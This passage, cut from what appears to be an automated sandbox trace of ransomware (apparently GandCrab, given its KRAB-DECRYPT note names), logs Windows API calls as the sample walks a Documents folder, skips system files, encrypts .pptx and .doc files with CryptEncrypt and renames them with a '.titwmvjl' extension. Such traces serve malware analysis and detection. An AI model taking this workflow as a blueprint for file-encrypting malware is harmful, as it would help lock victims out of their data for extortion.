returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\-oOIqjsx.pptx" [0089.886] lstrlenW (lpString=".titwmvjl") returned 9 [0089.886] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\-oOIqjsx.pptx") returned 97 [0089.886] VirtualAlloc (lpAddress=0x0, dwSize=0x102, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.887] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\-oOIqjsx.pptx.titwmvjl") returned 106 [0089.887] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\-oOIqjsx.pptx") returned 97 [0089.887] lstrlenW (lpString=".pptx") returned 5 [0089.887] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.887] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".pptx ") returned 6 [0089.887] lstrcmpiW (lpString1=".pptx", lpString2=".titwmvjl") returned -1 [0089.887] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.887] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\-oOIqjsx.pptx") returned 97 [0089.887] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\-oOIqjsx.pptx") returned 97 [0089.887] lstrcmpiW (lpString1="-oOIqjsx.pptx", lpString2="desktop.ini") returned 1 [0089.887] lstrcmpiW (lpString1="-oOIqjsx.pptx", lpString2="autorun.inf") returned 1 [0089.887] lstrcmpiW (lpString1="-oOIqjsx.pptx", lpString2="ntuser.dat") returned 1 [0089.887] lstrcmpiW (lpString1="-oOIqjsx.pptx", lpString2="iconcache.db") returned 1 [0089.887] lstrcmpiW (lpString1="-oOIqjsx.pptx", lpString2="bootsect.bak") returned 1 [0089.887] lstrcmpiW (lpString1="-oOIqjsx.pptx", lpString2="boot.ini") returned 1 [0089.887] lstrcmpiW (lpString1="-oOIqjsx.pptx", lpString2="ntuser.dat.log") returned 1 [0089.887] lstrcmpiW (lpString1="-oOIqjsx.pptx", lpString2="thumbs.db") returned -1 [0089.888] lstrcmpiW (lpString1="-oOIqjsx.pptx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.888] lstrcmpiW (lpString1="-oOIqjsx.pptx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.888] lstrcmpiW (lpString1="-oOIqjsx.pptx", lpString2="KRAB-DECRYPT.html") returned 1 [0089.888] lstrcmpiW (lpString1="-oOIqjsx.pptx", lpString2="CRAB-DECRYPT.html") returned 1 [0089.888] lstrcmpiW (lpString1="-oOIqjsx.pptx", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.888] lstrcmpiW (lpString1="-oOIqjsx.pptx", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.888] lstrcmpiW (lpString1="-oOIqjsx.pptx", lpString2="ntldr") returned 1 [0089.888] lstrcmpiW (lpString1="-oOIqjsx.pptx", lpString2="NTDETECT.COM") returned 1 [0089.888] lstrcmpiW (lpString1="-oOIqjsx.pptx", lpString2="Bootfont.bin") returned 1 [0089.888] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\-oOIqjsx.pptx") returned 97 [0089.888] lstrlenW (lpString=".pptx") returned 5 [0089.888] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.888] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".pptx ") returned 6 [0089.888] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.888] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.888] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\-oOIqjsx.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\-ooiqjsx.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0089.888] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.889] ReadFile (in: hFile=0x2cc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0089.889] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.889] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.889] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0089.890] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.891] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.891] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.891] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0089.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.891] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.891] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.891] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0089.892] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.892] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.893] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.893] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0089.893] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.893] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.893] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.893] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.893] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0089.894] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.894] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5033f8) returned 1 [0089.894] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.894] CryptGetKeyParam (in: hKey=0x5033f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0089.895] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.895] CryptEncrypt (in: hKey=0x5033f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e974*=0x100) returned 1 [0089.895] GetLastError () returned 0x0 [0089.895] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.895] CryptDestroyKey (hKey=0x5033f8) returned 1 [0089.895] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.895] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.895] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.895] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0089.896] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.896] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5037f8) returned 1 [0089.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.897] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0089.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.897] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e974*=0x100) returned 1 [0089.897] GetLastError () returned 0x0 [0089.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.897] CryptDestroyKey (hKey=0x5037f8) returned 1 [0089.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.897] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.897] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.898] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.898] ReadFile (in: hFile=0x2cc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ea20*=0x15ff0, lpOverlapped=0x0) returned 1 [0089.905] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffea010, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.905] WriteFile (in: hFile=0x2cc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x15ff0, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ea04*=0x15ff0, lpOverlapped=0x0) returned 1 [0089.906] WriteFile (in: hFile=0x2cc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0089.912] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.915] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.916] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.916] CloseHandle (hObject=0x2cc) returned 1 [0089.917] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\-oOIqjsx.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\-ooiqjsx.pptx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\-oOIqjsx.pptx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\-ooiqjsx.pptx.titwmvjl"), dwFlags=0x1) returned 1 [0089.918] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.918] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0089.918] lstrcmpW (lpString1="3f6.doc", lpString2=".") returned 1 [0089.918] lstrcmpW (lpString1="3f6.doc", lpString2="..") returned 1 [0089.919] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\", lpString2="3f6.doc" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\3f6.doc") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\3f6.doc" [0089.919] lstrlenW (lpString=".titwmvjl") returned 9 [0089.919] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\3f6.doc") returned 91 [0089.919] VirtualAlloc (lpAddress=0x0, dwSize=0xf6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.919] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\3f6.doc.titwmvjl") returned 100 [0089.919] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\3f6.doc") returned 91 [0089.919] lstrlenW (lpString=".doc") returned 4 [0089.919] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.919] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".doc ") returned 5 [0089.919] lstrcmpiW (lpString1=".doc", lpString2=".titwmvjl") returned -1 [0089.919] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.919] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\3f6.doc") returned 91 [0089.919] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\3f6.doc") returned 91 [0089.919] lstrcmpiW (lpString1="3f6.doc", lpString2="desktop.ini") returned -1 [0089.919] lstrcmpiW (lpString1="3f6.doc", lpString2="autorun.inf") returned -1 [0089.919] lstrcmpiW (lpString1="3f6.doc", lpString2="ntuser.dat") returned -1 [0089.919] lstrcmpiW (lpString1="3f6.doc", lpString2="iconcache.db") returned -1 [0089.919] lstrcmpiW (lpString1="3f6.doc", lpString2="bootsect.bak") returned -1 [0089.919] lstrcmpiW (lpString1="3f6.doc", lpString2="boot.ini") returned -1 [0089.919] lstrcmpiW (lpString1="3f6.doc", lpString2="ntuser.dat.log") returned -1 [0089.919] lstrcmpiW (lpString1="3f6.doc", lpString2="thumbs.db") returned -1 [0089.919] lstrcmpiW (lpString1="3f6.doc", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.919] lstrcmpiW (lpString1="3f6.doc", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.919] lstrcmpiW (lpString1="3f6.doc", lpString2="KRAB-DECRYPT.html") returned -1 [0089.919] lstrcmpiW (lpString1="3f6.doc", lpString2="CRAB-DECRYPT.html") returned -1 [0089.920] lstrcmpiW (lpString1="3f6.doc", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.920] lstrcmpiW (lpString1="3f6.doc", lpString2="CRAB-DECRYPT.txt") returned -1 [0089.920] lstrcmpiW (lpString1="3f6.doc", lpString2="ntldr") returned -1 [0089.920] lstrcmpiW (lpString1="3f6.doc", lpString2="NTDETECT.COM") returned -1 [0089.920] lstrcmpiW (lpString1="3f6.doc", lpString2="Bootfont.bin") returned -1 [0089.920] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\3f6.doc") returned 91 [0089.920] lstrlenW (lpString=".doc") returned 4 [0089.920] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.920] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".doc ") returned 5 [0089.920] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.920] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.920] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\3f6.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\3f6.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0089.920] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.921] ReadFile (in: hFile=0x2cc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0089.921] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.921] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.921] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0089.922] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.923] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.923] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.923] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0089.923] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.923] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.923] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.923] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.923] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0089.924] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.924] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.925] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.925] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0089.925] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.925] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.925] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.925] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.925] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0089.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.926] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5039b8) returned 1 [0089.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.926] CryptGetKeyParam (in: hKey=0x5039b8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0089.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.927] CryptEncrypt (in: hKey=0x5039b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e974*=0x100) returned 1 [0089.927] GetLastError () returned 0x0 [0089.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.927] CryptDestroyKey (hKey=0x5039b8) returned 1 [0089.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.927] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.927] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0089.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.929] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503238) returned 1 [0089.929] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.929] CryptGetKeyParam (in: hKey=0x503238, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0089.929] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.929] CryptEncrypt (in: hKey=0x503238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e974*=0x100) returned 1 [0089.929] GetLastError () returned 0x0 [0089.929] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.929] CryptDestroyKey (hKey=0x503238) returned 1 [0089.929] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.929] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.929] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.930] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.930] ReadFile (in: hFile=0x2cc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ea20*=0xd44b, lpOverlapped=0x0) returned 1 [0089.937] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xffff2bb5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.937] WriteFile (in: hFile=0x2cc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xd44b, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ea04*=0xd44b, lpOverlapped=0x0) returned 1 [0089.938] WriteFile (in: hFile=0x2cc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0089.939] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.943] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.943] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.943] CloseHandle (hObject=0x2cc) returned 1 [0089.944] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\3f6.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\3f6.doc"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\3f6.doc.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\3tz7peestvum\\3f6.doc.titwmvjl"), dwFlags=0x1) returned 1 [0089.944] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.945] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0089.945] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0089.945] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0089.945] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\d2ca4a09d2ca4deb61a.lock" [0089.945] lstrlenW (lpString=".titwmvjl") returned 9 [0089.945] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\d2ca4a09d2ca4deb61a.lock") returned 108 [0089.945] VirtualAlloc (lpAddress=0x0, dwSize=0x118, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.945] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\3tz7peEsTvuM\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 117 [0089.945] lstrlenW 